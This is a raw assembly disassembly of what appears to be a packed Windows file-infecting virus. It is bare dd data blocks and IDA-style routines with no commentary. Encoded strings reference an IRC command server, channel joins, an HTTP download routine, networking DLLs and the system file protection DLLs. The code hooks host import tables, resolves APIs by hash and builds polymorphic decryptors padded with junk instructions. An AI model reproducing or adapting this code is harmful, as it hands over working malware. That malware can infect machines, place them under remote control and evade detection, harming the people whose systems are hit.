dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h
dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h
dd 6A51CEh, 0FF535651h, 103F4695h, 0C13B5900h, 0DF850Fh
dd 858D0000h, 101EA3h, 0C68006Ah, 50000000h, 4695FF53h
dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh
dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h
dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h
dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh
dd 68752F2Fh, 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h
dd 103EE6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh
dd 64616Fh, 3F5695FFh, 0C0850010h, 0C9333674h, 3F808589h
dd 68510010h, 80000200h, 50565151h, 3F5A95FFh, 958D0010h
dd 101BA7h, 54C93350h, 51525051h, 8E95FF51h, 8700103Eh
dd 95FF2404h, 103E62h, 8D80C3F8h, 10157Fh, 6AC3F901h, 0FF016A01h
dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh, 8D3C5003h
dd 101DCBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh
dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F2295h, 968D8B00h
dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h
dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh
dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h
dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h
dd 2007473h, 7F500000h, 70010000h, 69786F72h, 72692E6Dh
dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 6C716274h
dd 6A6C6975h, 4553550Ah, 4A6D2052h, 204E494Fh, 72697626h
dd 550A7574h, 0E8h, 0ED815D00h, 101EB5h, 157F85C6h, 0FF000010h
dd 103EBA95h, 1FE8C100h, 1E6A3C74h, 3E72B58Bh, 0AC590010h
dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F76BDh, 2768B00h
dd 0A566A557h, 38EC858Dh, 858F0010h, 103912h, 0FA4689FAh
dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch
dd 8E84475h, 53000000h, 442E4346h, 0FF004C4Ch, 103EC695h
dd 74C00B00h, 26A930Dh, 6E95FF53h, 0FF00103Eh, 97E893D0h
dd 0E8FFFFFEh, 0Bh, 5F434653h, 442E534Fh, 0FF004C4Ch, 103EC695h
dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh, 8DC93300h
dd 10432485h, 51515100h, 51515051h, 0C295FF51h, 0E800103Eh
dd 0Bh, 52455355h, 442E3233h, 0FF004C4Ch, 103EC695h, 0AE800h
dd 73770000h, 6E697270h, 416674h, 6E95FF50h, 8900103Eh
dd 103E7685h, 8D310F00h, 1019858Dh, 7C858900h, 5100103Fh
dd 3EC695FFh, 68930010h, 4, 1992B58Dh, 8D590010h, 103F62BDh
dd 0F5C2E800h, 0C766FFFFh, 101E7585h, 83500000h, 101E77A5h
dd 958D0000h, 101E35h, 16A5450h, 6852006Ah, 80000002h
dd 3F6695FFh, 0C0850010h, 8D22755Ah, 101E688Dh, 66A5200h
dd 1E75B58Dh, 56540010h, 52515050h, 3F6A95FFh, 0FF580010h
dd 103F6295h, 8385C600h, 1041h, 0CE8h, 4F535700h, 32334B43h
dd 4C4C442Eh, 0C695FF00h, 9300103Eh, 768h, 0E9B58D00h
dd 59001018h, 3F32BD8Dh, 3DE80010h, 0E8FFFFF5h, 0Ch, 494E4957h
dd 2E54454Eh, 4C4C44h, 3EC695FFh, 0C0850010h, 235840Fh
dd 68930000h, 5, 1927B58Dh, 8D590010h, 103F4EBDh, 0F506E800h
dd 0BD83FFFFh, 103F52h, 10840F00h, 81000002h, 190ECh, 1685400h
dd 0FF000001h, 103F3295h, 90C48100h, 50000001h, 6AD48Bh
dd 5295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0E695FF00h
dd 0EB00103Eh, 77BD83E2h, 101Eh, 858D2975h, 101E7Bh, 3E95FF50h
dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh
dd 101E77h, 418385C6h, 6A010010h, 6A016A00h, 4A95FF02h
dd 8300103Fh, 840FFFF8h, 160h, 73958D93h, 6A00101Eh, 0FF535210h
dd 103F3A95h, 0FC08500h, 14085h, 94BD8D00h, 0B100101Eh
dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h
dd 103EBEh, 1EA2BD8Dh, 1B10010h, 0FFFA1DE8h, 8F958DFFh
dd 6A00101Eh, 146800h, 53520000h, 3F4695FFh, 448D0010h
dd 958D1424h, 104324h, 0AB60F50h, 1424448Bh, 208E0C1h
dd 4A12014Ah, 34A1202h, 824440Bh, 0C10FE180h, 0B5108E0h
dd 0FF102444h, 0BD8D5032h, 103F84h, 1CE8h, 362E2500h, 202E2078h
dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh
dd 95FF5700h, 103E76h, 0ACC481h, 6A0000h, 0FF535750h, 103F4695h
dd 988D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h, 5, 0A642526h
dd 95FF5700h, 103E76h, 500CC483h, 7680BEBh, 8D000000h
dd 101EA8BDh, 0FF535700h, 103F4695h, 7EC08500h, 84B58D54h
dd 8300103Fh, 101598A5h, 8D8D0000h, 104183h, 6ACE2Bh, 0FF535651h
dd 103F4295h, 0F88300h, 8B912F7Eh, 84B58DFEh, 0B000103Fh
dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh
dd 2BCF8BEAh, 84BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h
dd 103F36h, 157FBD80h, 74010010h, 7530682Ah, 95FF0000h
dd 103EE6h, 4183BD80h, 74000010h, 7785C711h, 101Eh, 0C6000000h
dd 10418385h, 8E90000h, 0C7FFFFFEh, 10158885h, 0
dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h
dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h
dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h
dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h
dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h
dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h
dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh
dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h
dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h
dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h
dd 656D6974h, 74492021h, 6C207327h, 21657461h, 3AAB5957h
dd 10A61429h, 4CA2A1A8h, 0D8B8B352h, 9C77466h, 0C26CCC5Ch
dd 10A61413h, 823BE0B8h, 0C89FCC00h, 0ABD8C6BDh, 3E9DF5C3h
dd 2FA2F473h, 14h dup(0)
; =============== S U B R O U T I N E =======================================
sub_3143B414 proc near ; CODE XREF: sub_3143B4CA:loc_3143B4B8�p
; sub_3143B51B+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+1042F4h], 0
and dword ptr [ebp+1042F8h], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_3143B430: ; CODE XREF: sub_3143B414+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_3143B452
cmp eax, [edx+8]
jnb short loc_3143B452
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+1042F4h], edx
mov [ebp+1042F8h], eax
jmp short loc_3143B457
; ---------------------------------------------------------------------------
loc_3143B452: ; CODE XREF: sub_3143B414+23�j
; sub_3143B414+28�j
add edx, 28h
loop loc_3143B430
loc_3143B457: ; CODE XREF: sub_3143B414+3C�j
popa
retn 4
sub_3143B414 endp
; ---------------------------------------------------------------------------
mov [ebp+102467h], al
call sub_3143B4CA
push 20h
lea eax, [ebp+102394h]
pop ecx
loc_3143B472: ; CODE XREF: UPX2:3143B479�j
cmp [eax], ebx
jz short loc_3143B482
add eax, 4
loop loc_3143B472
inc dword ptr [ebp+1042D0h]
retn
; ---------------------------------------------------------------------------
loc_3143B482: ; CODE XREF: UPX2:3143B474�j
neg ecx
add ecx, [ebp+102467h]
jecxz short loc_3143B49C
loc_3143B48C: ; CODE XREF: UPX2:3143B494�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_3143B48C
mov [ebp+102394h], ebx
; START OF FUNCTION CHUNK FOR sub_3143B4CA
loc_3143B49C: ; CODE XREF: UPX2:3143B48A�j
; sub_3143B4CA+34�j
cmp dword ptr [edx], 0
jz short loc_3143B4A6
sub esi, [edx]
add esi, [edx+10h]
loc_3143B4A6: ; CODE XREF: sub_3143B4CA-2B�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_3143B4B5
push dword ptr [edx]
jmp short loc_3143B4B8
; ---------------------------------------------------------------------------
loc_3143B4B5: ; CODE XREF: sub_3143B4CA-1B�j
push dword ptr [edx+10h]
loc_3143B4B8: ; CODE XREF: sub_3143B4CA-17�j
call sub_3143B414
sub ecx, esi
sub ecx, [ebp+1042F8h]
pop eax
add ecx, [ebx+34h]
retn
; END OF FUNCTION CHUNK FOR sub_3143B4CA
; =============== S U B R O U T I N E =======================================
sub_3143B4CA proc near ; CODE XREF: UPX2:3143B461�p
; FUNCTION CHUNK AT 3143B49C SIZE 0000002E BYTES
pop dword ptr [ebp+1042D4h]
mov dword ptr [ebp+1042D0h], 0
call sub_3143B51B
mov eax, [ebp+1042D0h]
call near ptr dword_3143AB50+43h
call sub_3143B507
cmp dword ptr [ebp+1042D0h], 0
jnz short loc_3143B500
mov [ebp+102410h], ebx
jmp short loc_3143B49C
; ---------------------------------------------------------------------------
loc_3143B500: ; CODE XREF: sub_3143B4CA+2C�j
dec dword ptr [ebp+1042D0h]
retn
sub_3143B4CA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3143B507 proc near ; CODE XREF: sub_3143B4CA+20�p
pop dword ptr [ebp+1042D4h]
mov [ebp+1042D0h], edx
call sub_3143B51B
xor ecx, ecx
retn
sub_3143B507 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3143B51B proc near ; CODE XREF: sub_3143B4CA+10�p
; sub_3143B507+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_3143B414
add edx, [ebp+1042F8h]
add edx, esi
loc_3143B52F: ; CODE XREF: sub_3143B51B+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_3143B640
cmp dword ptr [edx+10h], 0
jz locret_3143B640
mov eax, [edx+0Ch]
push eax
call sub_3143B414
add eax, [ebp+1042F8h]
add eax, esi
push eax
loc_3143B555: ; CODE XREF: sub_3143B51B+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_3143B575
cmp cl, 2Eh
jz short loc_3143B564
loc_3143B561: ; CODE XREF: sub_3143B51B+58�j
inc eax
jmp short loc_3143B555
; ---------------------------------------------------------------------------
loc_3143B564: ; CODE XREF: sub_3143B51B+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_3143B561
loc_3143B575: ; CODE XREF: sub_3143B51B+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_3143B638
cmp word ptr [eax-2], 3233h
jnz loc_3143B638
push esi
cmp dword ptr [edx], 0
jnz short loc_3143B598
mov ecx, [edx+10h]
jmp short loc_3143B59A
; ---------------------------------------------------------------------------
loc_3143B598: ; CODE XREF: sub_3143B51B+76�j
mov ecx, [edx]
loc_3143B59A: ; CODE XREF: sub_3143B51B+7B�j
add esi, ecx
push ecx
call sub_3143B414
add esi, [ebp+1042F8h]
loc_3143B5A8: ; CODE XREF: sub_3143B51B+90�j
; sub_3143B51B+117�j
lodsd
test eax, eax
js short loc_3143B5A8
jz loc_3143B637
push dword ptr [ebp+1042F8h]
push eax
call sub_3143B414
add eax, [ebp+1042F8h]
pop dword ptr [ebp+1042F8h]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_3143B5D4: ; CODE XREF: sub_3143B51B+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_3143B5EB
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_3143B5D4
; ---------------------------------------------------------------------------
loc_3143B5EB: ; CODE XREF: sub_3143B51B+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_3143B631
cmp ebx, 0DB6E45A8h
jz short loc_3143B631
cmp ebx, 0FFA13B59h
jz short loc_3143B631
cmp ebx, 0ACB522D6h
jz short loc_3143B631
cmp ebx, 0F358E993h
jz short loc_3143B631
cmp ebx, 0F358E97Dh
jz short loc_3143B631
cmp ebx, 0E1253F46h
jz short loc_3143B631
cmp ebx, 0E1253F30h
jz short loc_3143B631
call dword ptr [ebp+1042D4h]
loc_3143B631: ; CODE XREF: sub_3143B51B+D6�j
; sub_3143B51B+DE�j ...
pop ebx
jmp loc_3143B5A8
; ---------------------------------------------------------------------------
loc_3143B637: ; CODE XREF: sub_3143B51B+92�j
pop esi
loc_3143B638: ; CODE XREF: sub_3143B51B+60�j
; sub_3143B51B+6C�j
add edx, 14h
jmp loc_3143B52F
; ---------------------------------------------------------------------------
locret_3143B640: ; CODE XREF: sub_3143B51B+18�j
; sub_3143B51B+22�j
retn
sub_3143B51B endp
; ---------------------------------------------------------------------------
db 1, 6Ah, 4
dd 0F549E858h, 9588FFFFh, 102641h, 1831B866h, 0E4C0E202h
dd 66E20203h, 58066AABh, 0FFF52EE8h, 8C283FFh, 56AD187h
dd 0F521E858h, 0FA80FFFFh, 0B00B7303h, 41850250h, 0AA001026h
dd 686A27EBh, 0FA80AA58h, 0B0187503h, 0F501E811h, 1B8FFFFh
dd 84000000h, 0D10D74D2h, 0EBCAFEE0h, 0B805EBF6h, 80000000h
dd 0C3BFE2ABh, 39CC958Dh, 0D72B0010h, 0F7C3DAF7h, 1039C085h
dd 0
; ---------------------------------------------------------------------------
adc [edi], cl
xchg eax, ebp
rol cl, 0E0h
or esi, esi
test [esi+1001039h], edi
jnz short loc_3143B6D6
or ax, 2589h
jmp short loc_3143B6E9
; ---------------------------------------------------------------------------
loc_3143B6D6: ; CODE XREF: UPX2:3143B6CE�j
test byte ptr [ebp+1039BEh], 2
jnz short loc_3143B6E5
or ax, 2531h
jmp short loc_3143B6E9
; ---------------------------------------------------------------------------
loc_3143B6E5: ; CODE XREF: UPX2:3143B6DD�j
or ax, 2501h
loc_3143B6E9: ; CODE XREF: UPX2:3143B6D4�j
; UPX2:3143B6E3�j
stosw
call near ptr dword_3143B644+68h
mov eax, [ebx+34h]
mov [ebp+1042E8h], edx
stosd
retn
; =============== S U B R O U T I N E =======================================
sub_3143B6FB proc near ; CODE XREF: UPX2:3143BD47�p
test dword ptr [ebp+1039C0h], 10000000h
setnz al
add al, 0BCh
stosb
call near ptr dword_3143B644+68h
mov [ebp+1042ECh], edx
test byte ptr [ebp+1039BEh], 1
jnz short loc_3143B723
rdtsc
jmp short loc_3143B725
; ---------------------------------------------------------------------------
loc_3143B723: ; CODE XREF: sub_3143B6FB+22�j
sub eax, eax
loc_3143B725: ; CODE XREF: sub_3143B6FB+26�j
stosd
retn
sub_3143B6FB endp
; =============== S U B R O U T I N E =======================================
sub_3143B727 proc near ; CODE XREF: UPX2:loc_3143BD51�p
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_3143B75A
mov al, [ebp+1039BAh]
shl eax, 0Bh
or ax, 458Bh
stosw
mov al, 0F8h
stosb
mov al, [ebp+1039BAh]
shl eax, 1Bh
add eax, 6896467h
stosd
xor eax, eax
stosw
jmp short locret_3143B76C
; ---------------------------------------------------------------------------
loc_3143B75A: ; CODE XREF: sub_3143B727+A�j
mov eax, 58F64h
stosd
mov al, [ebp+1039BAh]
add al, 58h
shl eax, 18h
stosd
locret_3143B76C: ; CODE XREF: sub_3143B727+31�j
retn
sub_3143B727 endp
; =============== S U B R O U T I N E =======================================
sub_3143B76D proc near ; CODE XREF: sub_3143B7DF:loc_3143B806�p
; sub_3143B7DF+4C�p ...
mov byte ptr [ebp+10279Ch], 9
jmp short loc_3143B79B
; ---------------------------------------------------------------------------
loc_3143B776: ; CODE XREF: sub_3143B76D+44�j
mov al, 0FCh
jmp short loc_3143B79A
; ---------------------------------------------------------------------------
loc_3143B77A: ; CODE XREF: sub_3143B76D+48�j
mov ax, 0EBh
stosw
jmp short loc_3143B79B
; ---------------------------------------------------------------------------
loc_3143B782: ; CODE XREF: sub_3143B76D+4C�j
push 4
pop eax
call near ptr dword_3143AB50+43h
lea eax, [edx+edx*8]
shl eax, 8
add ax, 0C089h
stosw
jmp short loc_3143B79B
; ---------------------------------------------------------------------------
loc_3143B798: ; CODE XREF: sub_3143B76D+50�j
mov al, 90h
loc_3143B79A: ; CODE XREF: sub_3143B76D+B�j
; sub_3143B76D+60�j ...
stosb
loc_3143B79B: ; CODE XREF: sub_3143B76D+7�j
; sub_3143B76D+13�j ...
push 15h
pop eax
call near ptr dword_3143AB50+43h
add byte ptr [ebp+10279Ch], 6
cmp dl, 8
jnb short locret_3143B7DE
test dl, dl
jz short loc_3143B776
dec dl
jz short loc_3143B77A
dec dl
jz short loc_3143B782
dec dl
jz short loc_3143B798
dec dl
jz short loc_3143B7CF
dec dl
jz short loc_3143B7D6
dec dl
jz short loc_3143B7DA
mov al, 0F9h
jmp short loc_3143B79A
; ---------------------------------------------------------------------------
loc_3143B7CF: ; CODE XREF: sub_3143B76D+54�j
mov al, 87h
stosb
mov al, 0DBh
jmp short loc_3143B79A
; ---------------------------------------------------------------------------
loc_3143B7D6: ; CODE XREF: sub_3143B76D+58�j
mov al, 0F5h
jmp short loc_3143B79A
; ---------------------------------------------------------------------------
loc_3143B7DA: ; CODE XREF: sub_3143B76D+5C�j
mov al, 0F8h
jmp short loc_3143B79A
; ---------------------------------------------------------------------------
locret_3143B7DE: ; CODE XREF: sub_3143B76D+40�j
retn
sub_3143B76D endp
; =============== S U B R O U T I N E =======================================
sub_3143B7DF proc near ; CODE XREF: UPX2:loc_3143BC28�p
; UPX2:3143BDDB�p
test dword ptr [ebp+1039C0h], 2000h
mov al, 86h
jnz short loc_3143B7EF
add al, 4
loc_3143B7EF: ; CODE XREF: sub_3143B7DF+C�j
lea ecx, [edi-2]
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short loc_3143B806
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_3143B806: ; CODE XREF: sub_3143B7DF+1E�j
call sub_3143B76D
test dword ptr [ebp+1039C0h], 4000h
mov ax, 3166h
jnz short loc_3143B81D
mov ah, 29h
loc_3143B81D: ; CODE XREF: sub_3143B7DF+3A�j
stosw
mov al, 18h
or al, [ebp+1039BAh]
shl al, 3
stosb
call sub_3143B76D
mov al, 88h
test dword ptr [ebp+1039C0h], 8000h
jnz short loc_3143B840
mov al, 86h
loc_3143B840: ; CODE XREF: sub_3143B7DF+5D�j
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short locret_3143B854
mov al, 0
or byte ptr [edi-1], 40h
stosb
locret_3143B854: ; CODE XREF: sub_3143B7DF+6C�j
retn
sub_3143B7DF endp
; ---------------------------------------------------------------------------
loc_3143B855: ; CODE XREF: sub_3143C45B+183�p
lea edi, [ebp+1039CCh]
call sub_3143B76D
test dword ptr [ebp+1039C0h], 400000h
jz short near ptr unk_3143B86F
mov al, 60h
stosb
; ---------------------------------------------------------------------------
unk_3143B86F db 0F7h ; ÷ ; CODE XREF: UPX2:3143B86A�j
db 85h ; …
db 0C0h ; À
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
adc [edi+eax-48h], dh
push ebp
mov ebp, esp
add [ebx-3F7A08B1h], ch
cmp [eax], edx
add [ebx], al
; ---------------------------------------------------------------------------
db 2 dup(0), 2
dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042D8h, 0FFFECCE8h
dd 0AAE8B0FFh, 0DCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39C085F7h
dd 30010h, 1A740000h, 39C085F7h, 10h, 0A740200h, 0FFFE2EE8h
dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042D8h, 0C82BCF8Bh
dd 42E0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h
dd 1039C085h, 300h, 0F6137400h, 1039BE85h, 0A748000h, 0FFFDAAE8h
dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39C085F7h
dd 30010h, 5A740000h, 39BE85F6h, 75800010h, 0FD81E80Ah
dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh
dd 0FFB86639h, 91AB6615h, 0C0958BABh, 0F7001039h, 3C2F7D2h
dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh
dd 91AB6615h, 8BCF8BABh, 1042E085h, 89C82B00h, 85F7FC48h
dd 1039C0h, 3, 85F73874h, 1039C0h, 0C000000h, 85F72C74h
dd 1039C0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh
dd 39C085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh
dd 1039C0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh
dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039C0h
dd 8, 0BD807275h, 1039BEh, 0E8697400h, 0FFFFFD65h, 291829B8h
dd 0BAA50AC9h, 0C0001039h, 0A50A03E4h, 1039BAh, 0FD4BE8ABh
dd 0B1B0FFFFh, 0BE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh
dd 1039BAh, 4C0048Dh, 8E0C140h, 0AB668DB0h, 57AA01B0h
dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0C085F759h, 10001039h
dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h
dd 0AAE8B0FFh, 89ABC033h, 1042C4BDh, 0C085F700h, 20001039h
dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039C085h, 0
dd 89187480h, 1042F0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh
dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh, 1039B8h
dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0C085F7C0h, 40001039h
dd 74000000h, 28C48003h, 39B8A50Ah, 0AB660010h, 42C8BD89h
dd 0F7AB0010h, 1039C085h, 0
; ---------------------------------------------------------------------------
inc eax
jnz short loc_3143BB00
mov al, 50h
add al, [ebp+1039B8h]
stosb
loc_3143BB00: ; CODE XREF: UPX2:3143BAF5�j
test dword ptr [ebp+1039C0h], 80h
jnz short loc_3143BB17
mov al, 0B8h
or al, [ebp+1039B9h]
stosb
jmp short loc_3143BB54
; ---------------------------------------------------------------------------
loc_3143BB17: ; CODE XREF: UPX2:3143BB0A�j
mov ax, 1831h
test dword ptr [ebp+1039C0h], 100h
jz short loc_3143BB29
mov al, 29h
loc_3143BB29: ; CODE XREF: UPX2:3143BB25�j
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
mov ax, 0F081h
test dword ptr [ebp+1039C0h], 200h
jnz short loc_3143BB4C
mov ah, 0C8h
loc_3143BB4C: ; CODE XREF: UPX2:3143BB48�j
or ah, [ebp+1039B9h]
stosw
loc_3143BB54: ; CODE XREF: UPX2:3143BB15�j
mov [ebp+1042E4h], edi
mov eax, 29CCh
stosd
test dword ptr [ebp+1039C0h], 8
jz short loc_3143BBDD
call sub_3143B76D
test dword ptr [ebp+1039C0h], 400h
jnz short loc_3143BB88
mov al, 0B8h
or al, [ebp+1039BAh]
stosb
jmp short loc_3143BBD5
; ---------------------------------------------------------------------------
loc_3143BB88: ; CODE XREF: UPX2:3143BB7B�j
test dword ptr [ebp+1039C0h], 800h
jnz short loc_3143BBA5
mov ax, 0E083h
or ah, [ebp+1039BAh]
stosw
xor eax, eax
stosb
jmp short loc_3143BBBA
; ---------------------------------------------------------------------------
loc_3143BBA5: ; CODE XREF: UPX2:3143BB92�j
mov ax, 1829h
or ah, [ebp+1039BAh]
shl ah, 3
or ah, [ebp+1039BAh]
stosw
loc_3143BBBA: ; CODE XREF: UPX2:3143BBA3�j
test dword ptr [ebp+1039C0h], 1000h
mov ax, 0C081h
jz short loc_3143BBCD
add ah, 8
loc_3143BBCD: ; CODE XREF: UPX2:3143BBC8�j
or ah, [ebp+1039BAh]
stosw
loc_3143BBD5: ; CODE XREF: UPX2:3143BB86�j
movzx eax, byte ptr [ebp+1039BEh]
stosd
loc_3143BBDD: ; CODE XREF: UPX2:3143BB6A�j
call sub_3143B76D
test dword ptr [ebp+1039C0h], 40000000h
jz short loc_3143BBFC
mov al, 50h
add al, [ebp+1039B8h]
stosb
call sub_3143B76D
loc_3143BBFC: ; CODE XREF: UPX2:3143BBEC�j
lea ecx, [edi-2]
mov [ebp+1042CCh], ecx
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_3143BC28
mov al, 0E8h
stosb
mov eax, [ebp+1042F0h]
sub eax, edi
sub eax, 4
stosd
mov [ebp+1042F0h], edi
jmp short loc_3143BC2D
; ---------------------------------------------------------------------------
loc_3143BC28: ; CODE XREF: UPX2:3143BC0F�j
call sub_3143B7DF
loc_3143BC2D: ; CODE XREF: UPX2:3143BC26�j
call sub_3143B76D
test dword ptr [ebp+1039C0h], 10000h
jnz short loc_3143BC49
mov al, 40h
or al, [ebp+1039B8h]
stosb
jmp short loc_3143BC58
; ---------------------------------------------------------------------------
loc_3143BC49: ; CODE XREF: UPX2:3143BC3C�j
mov ax, 0C083h
or ah, [ebp+1039B8h]
stosw
mov al, 1
stosb
loc_3143BC58: ; CODE XREF: UPX2:3143BC47�j
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_3143BC93
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_3143BC8A
mov al, 0C0h
or al, [ebp+1039BAh]
mov ah, [ebp+1039BFh]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_3143BC92
; ---------------------------------------------------------------------------
loc_3143BC8A: ; CODE XREF: UPX2:3143BC6E�j
mov al, 40h
or al, [ebp+1039BAh]
loc_3143BC92: ; CODE XREF: UPX2:3143BC88�j
stosb
loc_3143BC93: ; CODE XREF: UPX2:3143BC62�j
test dword ptr [ebp+1039C0h], 80000h
jnz short loc_3143BCAF
mov ax, 0E883h
or ah, [ebp+1039B9h]
stosw
mov al, 1
jmp short loc_3143BCB7
; ---------------------------------------------------------------------------
loc_3143BCAF: ; CODE XREF: UPX2:3143BC9D�j
mov al, 48h
or al, [ebp+1039B9h]
loc_3143BCB7: ; CODE XREF: UPX2:3143BCAD�j
stosb
call sub_3143B76D
test dword ptr [ebp+1039C0h], 100000h
mov cl, 75h
jnz short loc_3143BCF0
mov ax, 0F883h
or ah, [ebp+1039B9h]
stosw
xor eax, eax
stosb
sub [ebp+1042CCh], edi
test dword ptr [ebp+1039C0h], 200000h
jnz short loc_3143BD0B
mov cl, 77h
jmp short loc_3143BD0B
; ---------------------------------------------------------------------------
loc_3143BCF0: ; CODE XREF: UPX2:3143BCC9�j
mov ax, 1809h
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
sub [ebp+1042CCh], edi
loc_3143BD0B: ; CODE XREF: UPX2:3143BCEA�j
; UPX2:3143BCEE�j
mov al, cl
mov ah, [ebp+1042CCh]
stosw
mov al, 58h
add al, [ebp+1039B8h]
stosb
call sub_3143B76D
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_3143BD5B
test dword ptr [ebp+1039C0h], 8000000h
jnz short loc_3143BD5B
test dword ptr [ebp+1039C0h], 6000000h
jnz short loc_3143BD51
call sub_3143B6FB
call sub_3143B76D
loc_3143BD51: ; CODE XREF: UPX2:3143BD45�j
call sub_3143B727
call sub_3143B76D
loc_3143BD5B: ; CODE XREF: UPX2:3143BD2D�j
; UPX2:3143BD39�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_3143BD6F
mov al, 0C9h
stosb
call sub_3143B76D
loc_3143BD6F: ; CODE XREF: UPX2:3143BD65�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_3143BDA5
mov al, 7
sub al, [ebp+1039B8h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+1039B8h]
shl ah, 3
add ah, 4
stosd
call sub_3143B76D
mov al, 61h
stosb
call sub_3143B76D
loc_3143BDA5: ; CODE XREF: UPX2:3143BD79�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
stosw
call sub_3143B76D
test dword ptr [ebp+1039C0h], 20h
jz short loc_3143BE31
